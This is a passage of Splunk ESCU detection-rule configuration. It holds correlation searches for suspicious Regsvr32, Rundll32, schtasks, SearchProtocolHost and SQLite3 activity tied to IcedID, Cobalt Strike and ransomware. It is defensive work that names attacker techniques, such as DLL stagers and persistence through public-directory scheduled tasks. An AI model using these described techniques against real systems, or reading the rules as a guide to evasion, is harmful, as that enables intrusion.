action.escu.creation_date = 2023-03-02 action.escu.modification_date = 2023-03-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Regsvr32 Register Suspicious Path - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Regsvr32 Activity", "IcedID", "Living Off The Land", "Qakbot"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to evade detection by using a non-standard file extension. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 35}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Regsvr32 Register Suspicious Path - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Regsvr32 Activity", "IcedID", "Living Off The Land", "Qakbot"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.010"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Adversaries may abuse Regsvr32.exe to proxy execution of malicious code by using non-standard file extensions to load DLLs. 
Upon investigating, look for network connections to remote destinations (internal or external). Review additional parrallel processes and child processes for additional activity. action.notable.param.rule_title = Suspicious Regsvr32 Register Suspicious Path action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_regsvr32` Processes.process IN ("*\\appdata\\*", "*\\programdata\\*","*\\windows\\temp\\*") NOT (Processes.process IN ("*.dll*", "*.ax*", "*.ocx*")) by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `suspicious_regsvr32_register_suspicious_path_filter` [ESCU - Suspicious Rundll32 dllregisterserver - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies rundll32.exe using dllregisterserver on the command line to load a DLL. When a DLL is registered, the DllRegisterServer method entry point in the DLL is invoked. This is typically seen when a DLL is being registered on the system. Not every instance is considered malicious, but it will capture malicious use of it. During investigation, review the parent process and parrellel processes executing. Capture the DLL being loaded and inspect further. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies rundll32.exe using dllregisterserver on the command line to load a DLL. When a DLL is registered, the DllRegisterServer entry point in the DLL is invoked. This is typically seen when a DLL is being registered on the system. Not every instance is malicious, but the search will capture malicious use. During investigation, review the parent process and parallel processes executing. Capture the DLL being loaded and inspect it further. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = This is likely to produce false positives and will require some filtering. Tune the query by adding command line paths to known good DLLs, or filtering based on parent process names.
action.escu.creation_date = 2021-02-09
action.escu.modification_date = 2021-02-09
action.escu.confidence = high
action.escu.full_search_name = ESCU - Suspicious Rundll32 dllregisterserver - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Suspicious Rundll32 Activity", "Living Off The Land", "IcedID"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to register a DLL.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 35}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 35}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Suspicious Rundll32 dllregisterserver - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Rundll32 Activity", "Living Off The Land", "IcedID"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies rundll32.exe using dllregisterserver on the command line to load a DLL. When a DLL is registered, the DllRegisterServer entry point in the DLL is invoked. This is typically seen when a DLL is being registered on the system. Not every instance is malicious, but the search will capture malicious use. During investigation, review the parent process and parallel processes executing. Capture the DLL being loaded and inspect it further. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64.
action.notable.param.rule_title = Suspicious Rundll32 dllregisterserver
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*dllregisterserver* by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_rundll32_dllregisterserver_filter`

[ESCU - Suspicious Rundll32 no Command Line Arguments - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Although unlikely, some legitimate applications may use a moved copy of rundll32, triggering a false positive.
action.escu.creation_date = 2023-07-10
action.escu.modification_date = 2023-07-10
action.escu.confidence = high
action.escu.full_search_name = ESCU - Suspicious Rundll32 no Command Line Arguments - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Suspicious Rundll32 Activity", "Cobalt Strike", "BlackByte Ransomware", "PrintNightmare CVE-2021-34527", "Graceful Wipe Out Attack"]
action.risk = 1
action.risk.param._risk_message = Suspicious rundll32.exe process with no command line arguments executed on $dest$ by $user$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Suspicious Rundll32 no Command Line Arguments - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Rundll32 Activity", "Cobalt Strike", "BlackByte Ransomware", "PrintNightmare CVE-2021-34527", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 70, "cve": ["CVE-2021-34527"], "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64.
action.notable.param.rule_title = Suspicious Rundll32 no Command Line Arguments
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_rundll32` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process="(?i)(rundll32\.exe.{0,4}$)" | `suspicious_rundll32_no_command_line_arguments_filter`

[ESCU - Suspicious Rundll32 PluginInit - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects a suspicious rundll32.exe process with the PluginInit parameter. This technique is commonly seen in IcedID malware to execute its initial DLL stager, which downloads another payload to the compromised machine.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search detects a suspicious rundll32.exe process with the PluginInit parameter. This technique is commonly seen in IcedID malware to execute its initial DLL stager, which downloads another payload to the compromised machine.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. \
These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Third-party applications may use this DLL export name to execute a function.
action.escu.creation_date = 2021-07-26
action.escu.modification_date = 2021-07-26
action.escu.confidence = high
action.escu.full_search_name = ESCU - Suspicious Rundll32 PluginInit - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["IcedID"]
action.risk = 1
action.risk.param._risk_message = rundll32 process $process_name$ with commandline $process$ in host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}, {"threat_object_field": "process_name", "threat_object_type": "process"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Suspicious Rundll32 PluginInit - Rule
action.correlationsearch.annotations = {"analytic_story": ["IcedID"], "cis20": ["CIS 10"], "confidence": 70, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search detects a suspicious rundll32.exe process with the PluginInit parameter. This technique is commonly seen in IcedID malware to execute its initial DLL stager, which downloads another payload to the compromised machine.
action.notable.param.rule_title = Suspicious Rundll32 PluginInit
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*PluginInit* by Processes.process_name Processes.process Processes.parent_process_name Processes.original_file_name Processes.parent_process Processes.process_id Processes.parent_process_id Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_rundll32_plugininit_filter`

[ESCU - Suspicious Rundll32 StartW - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies rundll32.exe executing a DLL function named Start or StartW on the command line, which is commonly observed with Cobalt Strike x86 and x64 DLL payloads. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. Typically, the DLL will be written to and loaded from a world-writable path or user location. In most instances it will not have a valid certificate (unsigned). During investigation, review the parent process and other parallel application execution. Capture and triage the DLL in question. \
In the instance of Cobalt Strike, rundll32.exe is the default process it opens and injects shellcode into. This default process can be changed, but typically is not.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies rundll32.exe executing a DLL function named Start or StartW on the command line, which is commonly observed with Cobalt Strike x86 and x64 DLL payloads. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. Typically, the DLL will be written to and loaded from a world-writable path or user location. In most instances it will not have a valid certificate (unsigned). During investigation, review the parent process and other parallel application execution. Capture and triage the DLL in question. In the instance of Cobalt Strike, rundll32.exe is the default process it opens and injects shellcode into. This default process can be changed, but typically is not.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Although unlikely, some legitimate applications may use Start as a function and call it via the command line. Filter as needed.
action.escu.creation_date = 2023-07-10
action.escu.modification_date = 2023-07-10
action.escu.confidence = high
action.escu.full_search_name = ESCU - Suspicious Rundll32 StartW - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Trickbot", "Suspicious Rundll32 Activity", "Cobalt Strike", "BlackByte Ransomware", "Graceful Wipe Out Attack"]
action.risk = 1
action.risk.param._risk_message = rundll32.exe running with suspicious StartW parameters on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Suspicious Rundll32 StartW - Rule
action.correlationsearch.annotations = {"analytic_story": ["Trickbot", "Suspicious Rundll32 Activity", "Cobalt Strike", "BlackByte Ransomware", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies rundll32.exe executing a DLL function named Start or StartW on the command line, which is commonly observed with Cobalt Strike x86 and x64 DLL payloads. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. Typically, the DLL will be written to and loaded from a world-writable path or user location. In most instances it will not have a valid certificate (unsigned). During investigation, review the parent process and other parallel application execution. Capture and triage the DLL in question. In the instance of Cobalt Strike, rundll32.exe is the default process it opens and injects shellcode into. This default process can be changed, but typically is not.
action.notable.param.rule_title = Suspicious Rundll32 StartW
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*start* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_rundll32_startw_filter`

[ESCU - Suspicious Scheduled Task from Public Directory - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic, "Suspicious Scheduled Task from Public Directory", detects the registration of scheduled tasks that execute a binary or script from public directories, a behavior often associated with malware deployment. It utilizes the Sysmon Event ID 1 data source, searching for instances where schtasks.exe is invoked with the /create command and a path under users\public, \programdata\, or \windows\temp. The registration of such scheduled tasks in public directories could suggest that an attacker is trying to maintain persistence or execute malicious scripts. \
If confirmed as a true positive, this could lead to data compromise, unauthorized access, and potential lateral movement within the network.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.005", "T1053"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic, "Suspicious Scheduled Task from Public Directory", detects the registration of scheduled tasks that execute a binary or script from public directories, a behavior often associated with malware deployment. It utilizes the Sysmon Event ID 1 data source, searching for instances where schtasks.exe is invoked with the /create command and a path under users\public, \programdata\, or \windows\temp. The registration of such scheduled tasks in public directories could suggest that an attacker is trying to maintain persistence or execute malicious scripts. If confirmed as a true positive, this could lead to data compromise, unauthorized access, and potential lateral movement within the network.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = The main source of false positives could be the legitimate use of scheduled tasks from these directories. Careful tuning of this search may be necessary to suit the specifics of your environment, reducing the rate of false positives.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Suspicious Scheduled Task from Public Directory - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Azorult", "Ryuk Ransomware", "Scheduled Tasks", "Ransomware", "Windows Persistence Techniques", "Living Off The Land", "DarkCrystal RAT", "CISA AA23-347A"]
action.risk = 1
action.risk.param._risk_message = Suspicious scheduled task registered on $dest$ from Public Directory
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Suspicious Scheduled Task from Public Directory - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azorult", "Ryuk Ransomware", "Scheduled Tasks", "Ransomware", "Windows Persistence Techniques", "Living Off The Land", "DarkCrystal RAT", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.005", "T1053"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=schtasks.exe (Processes.process=*\\users\\public\\* OR Processes.process=*\\programdata\\* OR Processes.process=*windows\\temp*) Processes.process=*/create* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `suspicious_scheduled_task_from_public_directory_filter`

[ESCU - Suspicious SearchProtocolHost no Command Line Arguments - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies searchprotocolhost.exe with no command line arguments. It is unusual for searchprotocolhost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. searchprotocolhost.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies searchprotocolhost.exe with no command line arguments. It is unusual for searchprotocolhost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. searchprotocolhost.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Limited false positives may be present in small environments. Tuning may be required based on parent process.
action.escu.creation_date = 2023-07-10
action.escu.modification_date = 2023-07-10
action.escu.confidence = high
action.escu.full_search_name = ESCU - Suspicious SearchProtocolHost no Command Line Arguments - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"]
action.risk = 1
action.risk.param._risk_message = Suspicious searchprotocolhost.exe process with no command line arguments executed on $dest$ by $user$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Suspicious SearchProtocolHost no Command Line Arguments - Rule
action.correlationsearch.annotations = {"analytic_story": ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies searchprotocolhost.exe with no command line arguments. It is unusual for searchprotocolhost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. searchprotocolhost.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64.
action.notable.param.rule_title = Suspicious SearchProtocolHost no Command Line Arguments
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=searchprotocolhost.exe by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process="(?i)(searchprotocolhost\.exe.{0,4}$)" | `suspicious_searchprotocolhost_no_command_line_arguments_filter`

[ESCU - Suspicious SQLite3 LSQuarantine Behavior - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic identifies the use of SQLite3 to query the macOS preferences for the original URL the pkg was downloaded from. This particular behavior is common with macOS adware and other malicious software. Upon triage, review other processes in parallel for suspicious activity. Identify any recent package installations.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1074"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of a SQLite3 querying the MacOS preferences to identify the original URL the pkg was downloaded from. This particular behavior is common with MacOS adware-malicious software. Upon triage, review other processes in parallel for suspicious activity. Identify any recent package installations. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Unknown. 
action.escu.creation_date = 2021-02-22
action.escu.modification_date = 2021-02-22
action.escu.confidence = high
action.escu.full_search_name = ESCU - Suspicious SQLite3 LSQuarantine Behavior - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Silver Sparrow"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Suspicious SQLite3 LSQuarantine Behavior - Rule
action.correlationsearch.annotations = {"analytic_story": ["Silver Sparrow"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1074"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the use of SQLite3 to query the MacOS preferences to identify the original URL the pkg was downloaded from. This particular behavior is common with MacOS adware-malicious software. Upon triage, review other processes in parallel for suspicious activity. Identify any recent package installations.
action.notable.param.rule_title = Suspicious SQLite3 LSQuarantine Behavior
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
